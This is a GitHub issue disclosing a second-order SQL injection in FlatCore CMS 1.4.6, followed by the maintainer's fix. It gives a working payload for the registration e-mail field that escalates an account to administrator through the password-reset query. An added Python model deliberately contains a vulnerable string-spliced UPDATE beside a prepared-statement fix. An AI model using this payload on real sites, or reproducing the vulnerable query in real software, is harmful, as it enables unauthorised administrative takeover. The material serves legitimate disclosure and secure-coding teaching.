
SQL Injection vulnerability (Users DB) on FlatCore v1.4.6 #29

Closed
shardulm94 opened this issue Apr 11, 2017 · 1 comment

@shardulm94 commented Apr 11, 2017

Exploit Title: SQL Injection vulnerability (Users DB) on FlatCore v1.4.6
Date: 11-April-2017
Exploit Author: @shardulm94
Software Link: https://github.com/flatCore/flatCore-CMS/archive/v1.4.6.zip
Version: 1.4.6

Description:
SQL Injection allows an attacker to run malicious SQL statements on a database and thus to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

Exploit:
The vulnerability is due to a non-parameterized SQL query at https://github.com/flatCore/flatCore-CMS/blob/master/core/password.php#L37. This vulnerability along with missing validation on the email field of the registration and password reset forms can be used to create an administrator account with full privileges. We assume that FlatCore is installed at http://localhost/flatcore/ and new registrations are enabled.

  1. Go to http://localhost/flatcore/register/. Fill in the username uname and some password. Fill in the email field with '; UPDATE fc_user SET user_class='administrator', user_verified='verified', user_drm='||drm_acp_user|||||' WHERE user_nick='uname' --. This step is required since the password reset form checks for valid emails in the DB before reset.
  2. Since the register page uses a parameterized query, the whole email string will be stored in the DB.
  3. Now go to http://localhost/flatcore/password/ and put in the email address mentioned while registering. Due to https://github.com/flatCore/flatCore-CMS/blob/master/core/password.php#L36, the query will effectively become UPDATE fc_user SET user_reset_psw = '$reset_token' WHERE user_mail = ''; UPDATE fc_user SET user_class='administrator', user_verified='verified', user_drm='||drm_acp_user|||||' WHERE user_nick='uname' --.
  4. As you can see, this will set administrator as the user class for the newly created user uname and will also give it permission to manage the user management screen.
  5. Once inside the admin panel, the attacker can give himself extra privileges.

References:
https://www.owasp.org/index.php/SQL_Injection

Screenshots:
  Registration Form [image]
  Password Reset [image]
  New user created and verified with ability to edit users [image]
  Logged in as new user and change privileges [image]

Impact: Read and modify the users database
Mitigation: Use of Parameterized SQL Queries and Validation on email fields
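
The chain in steps 1 to 5 is a second-order injection: the payload is stored safely by a parameterized INSERT and only detonates later, when the reset query splices the stored value back into SQL text. The following Python/sqlite3 model is an added example, not flatCore's (PHP) code. The table and column names and the payload string are taken from the report above; the schema, the use of sqlite3, the e-mail regex, and executescript() standing in for a database driver that accepts stacked statements are assumptions made here.

```python
"""Second-order SQL injection, modelled in sqlite3.

Added example, not flatCore's own code. Table and column names
(fc_user, user_nick, user_mail, user_class, user_verified, user_drm,
user_reset_psw) and the payload are taken from the issue text; the
schema, sqlite3, and executescript() standing in for a driver that
runs stacked statements are assumptions made here.
"""
import re
import secrets
import sqlite3

# Payload from the issue: stored verbatim at registration, detonated on reset.
PAYLOAD_EMAIL = ("'; UPDATE fc_user SET user_class='administrator', "
                 "user_verified='verified', user_drm='||drm_acp_user|||||' "
                 "WHERE user_nick='uname' --")

# Assumed validation rule: one '@', a dot in the domain, no whitespace or quotes.
EMAIL_RE = re.compile(r"^[^@\s'\"]+@[^@\s'\"]+\.[^@\s'\"]+$")


def valid_email(mail):
    return EMAIL_RE.fullmatch(mail) is not None


def new_db():
    # Assumed minimal schema; only the columns named in the report.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE fc_user (
            user_nick      TEXT PRIMARY KEY,
            user_mail      TEXT NOT NULL,
            user_psw       TEXT NOT NULL,
            user_class     TEXT NOT NULL DEFAULT 'user',
            user_verified  TEXT NOT NULL DEFAULT 'unverified',
            user_drm       TEXT NOT NULL DEFAULT '',
            user_reset_psw TEXT
        );
    """)
    return con


def register(con, nick, mail, password, validate=False):
    # Parameterized INSERT: the e-mail is stored verbatim, so the payload
    # survives this step untouched (step 2 of the report). With validation
    # on, the payload never reaches the database at all.
    if validate and not valid_email(mail):
        return False
    con.execute("INSERT INTO fc_user (user_nick, user_mail, user_psw) VALUES (?, ?, ?)",
                (nick, mail, password))
    con.commit()
    return True


def reset_vulnerable(con, mail):
    # The lookup is parameterized (the stored e-mail must match), but the
    # UPDATE splices the stored value into SQL text. executescript() plays
    # the part of a driver that executes the stacked second statement.
    row = con.execute("SELECT user_mail FROM fc_user WHERE user_mail = ?", (mail,)).fetchone()
    if row is None:
        return False
    token = secrets.token_hex(16)
    con.executescript(
        f"UPDATE fc_user SET user_reset_psw = '{token}' WHERE user_mail = '{row[0]}'")
    return True


def reset_fixed(con, mail):
    # Prepared statement: the stored value is bound as data, never parsed as SQL.
    row = con.execute("SELECT user_mail FROM fc_user WHERE user_mail = ?", (mail,)).fetchone()
    if row is None:
        return False
    token = secrets.token_hex(16)
    con.execute("UPDATE fc_user SET user_reset_psw = ? WHERE user_mail = ?", (token, row[0]))
    con.commit()
    return True


def run_scenario(reset, validate_on_register=False):
    """Register 'uname' with the payload e-mail, then request a reset for it.

    Returns (registered, reset_ok, user_class, user_verified) for 'uname'.
    """
    con = new_db()
    registered = register(con, "uname", PAYLOAD_EMAIL, "hunter2", validate=validate_on_register)
    reset_ok = reset(con, PAYLOAD_EMAIL) if registered else False
    row = con.execute(
        "SELECT user_class, user_verified FROM fc_user WHERE user_nick = 'uname'").fetchone()
    cls, verified = row if row else (None, None)
    return registered, reset_ok, cls, verified


if __name__ == "__main__":
    print("vulnerable reset:               ", run_scenario(reset_vulnerable))
    print("prepared statement only:        ", run_scenario(reset_fixed))
    print("prepared statement + validation:", run_scenario(reset_fixed, True))
```

Two things worth noticing when running it: the prepared statement alone is enough to neutralise the stored payload (the user stays 'user'/'unverified' even though the reset succeeds), and the e-mail validation is defence in depth that keeps the payload out of the table in the first place. sqlite3's execute() refuses stacked statements, which is why executescript() stands in for the driver here; whether a real deployment executes the second statement depends on the database driver and how the query is issued.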

patkon added a commit that referenced this issue Apr 12, 2017

@patkon (Member) commented Apr 12, 2017

I've changed the SQL Queries to Prepared Statements and the E-Mail Address will be validated.

@shardulm94 shardulm94 closed this Jun 14, 2017
